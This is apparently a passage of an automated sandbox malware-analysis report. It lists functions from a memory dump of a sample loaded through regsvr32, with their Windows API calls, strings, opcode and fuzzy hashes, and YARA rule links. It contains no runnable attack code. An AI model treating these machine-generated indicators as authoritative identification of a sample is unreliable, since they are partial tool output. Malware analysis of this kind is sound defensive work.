                                                • Opcode Fuzzy Hash: 55e89009008a6dbdc979100c8e4b407f18368ef823855b08dea0628b3d497dcf
                                                • Instruction Fuzzy Hash: C20184BE604191ABCB06DF21C4506BD7BBABFC5210B744849EC0257380DF746E52CBC2
                                                Function 7EC3F3BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,7EC0E206), ref: 7EC3F3F5
                                                • CloseHandle.KERNEL32(7EC0E206), ref: 7EC3F49F
                                                • CloseHandle.KERNEL32(?), ref: 7EC3F4A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: ?
                                                • API String ID: 2922976086-1684325040
                                                • Opcode ID: 448e5dabcb597220e46ff6f1064c5c71baa9512de4eb7100308a37dbaf97e58a
                                                • Instruction ID: 1aacaca7d433b064d4db5f8513e12b64f7dd3a6d44af7b1dc65c3b640c1641b6
                                                • Opcode Fuzzy Hash: 448e5dabcb597220e46ff6f1064c5c71baa9512de4eb7100308a37dbaf97e58a
                                                • Instruction Fuzzy Hash: 9A21B47D900299BBDF218A96CC05EEF7B7DEFC5700FA04869F915A5050D7318A24CE61
                                                Function 7EC44F92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7EC44F43,00000000,00000001,7EF455E4,?,?,?,7EC450E6,00000004,InitializeCriticalSectionEx,7EC6AE34,InitializeCriticalSectionEx), ref: 7EC44F9F
                                                • GetLastError.KERNEL32(?,7EC44F43,00000000,00000001,7EF455E4,?,?,?,7EC450E6,00000004,InitializeCriticalSectionEx,7EC6AE34,InitializeCriticalSectionEx,00000000,?,7EC44E9D), ref: 7EC44FA9
                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7EC43D43), ref: 7EC44FD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: e72f0fa1edc411cc8d518d2ebd1a5f727ba1aeab7b60710a99374bd44c7a866d
                                                • Instruction ID: 5ade9409436d7c8f96c36c5ec87d39a5f6db6d8ed19475277e0d428d1e790d3e
                                                • Opcode Fuzzy Hash: e72f0fa1edc411cc8d518d2ebd1a5f727ba1aeab7b60710a99374bd44c7a866d
                                                • Instruction Fuzzy Hash: 0AE0487E654204B7EB511EA2DD0AF4A3E65BB11752F304420F90FAC4D4DB61D5209A94
                                                Function 7EC3F930 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EC3F717,?,?,?,7EC3EF6C,?,0000000F,?,00000000,00000208), ref: 7EC3F946
                                                • GetProcAddress.KERNEL32(00000000), ref: 7EC3F94D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: RtlRandomEx$ntdll.dll
                                                • API String ID: 1646373207-4284430886
                                                • Opcode ID: 0905a2323dfa6900891ba52710db362b481d21183ba8eec6a5a0a40302c1ca60
                                                • Instruction ID: 6e3575ee96849a869e628907baa52bc085719e94445d70039e831072e1221c8f
                                                • Opcode Fuzzy Hash: 0905a2323dfa6900891ba52710db362b481d21183ba8eec6a5a0a40302c1ca60
                                                • Instruction Fuzzy Hash: 44D0A73E1003856BDF01AFEBCE48A173B6D9B451043200890FD0EC9200D73495988A50
                                                Function 7EC155B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::exception::exception.LIBCONCRTD ref: 7EC15868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::exception::exception
                                                • String ID: parse error$parse_error
                                                • API String ID: 2807920213-1820534363
                                                • Opcode ID: e24d0d372380ae654f170be4cb3d8bffa03b1254b7087d70629afb7b5953ee57
                                                • Instruction ID: eeddad0a744deb3682c1f6d290a3f8a3434fca3eae159f927d9acc9a1c860ed2
                                                • Opcode Fuzzy Hash: e24d0d372380ae654f170be4cb3d8bffa03b1254b7087d70629afb7b5953ee57
                                                • Instruction Fuzzy Hash: 09A126B8D04258DFCB18CF98C990BEEBBB1BF49300F208599D959AB345DB306A45DF90
                                                Function 7EBF7AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7EBF7AF3
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EBF7BBF
                                                  • Part of subcall function 7EC3FEA2: _Yarn.LIBCPMT ref: 7EC3FEC1
                                                  • Part of subcall function 7EC3FEA2: _Yarn.LIBCPMT ref: 7EC3FEE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EBE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_7ebe0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: 748b82ea1289020b3f4ad15a481931bf8831831a31cd550dcf062645c17b2091
                                                • Instruction ID: 9f8aff0bfc01ec2ad397dc86d4e81e3c465f3b72e9ceadb91da2639afd9cef65
                                                • Opcode Fuzzy Hash: 748b82ea1289020b3f4ad15a481931bf8831831a31cd550dcf062645c17b2091
                                                • Instruction Fuzzy Hash: FA4106B4905289DFDB01CF98C954BAEFBF1BF49304F248599D414AB381C77A9901CBA5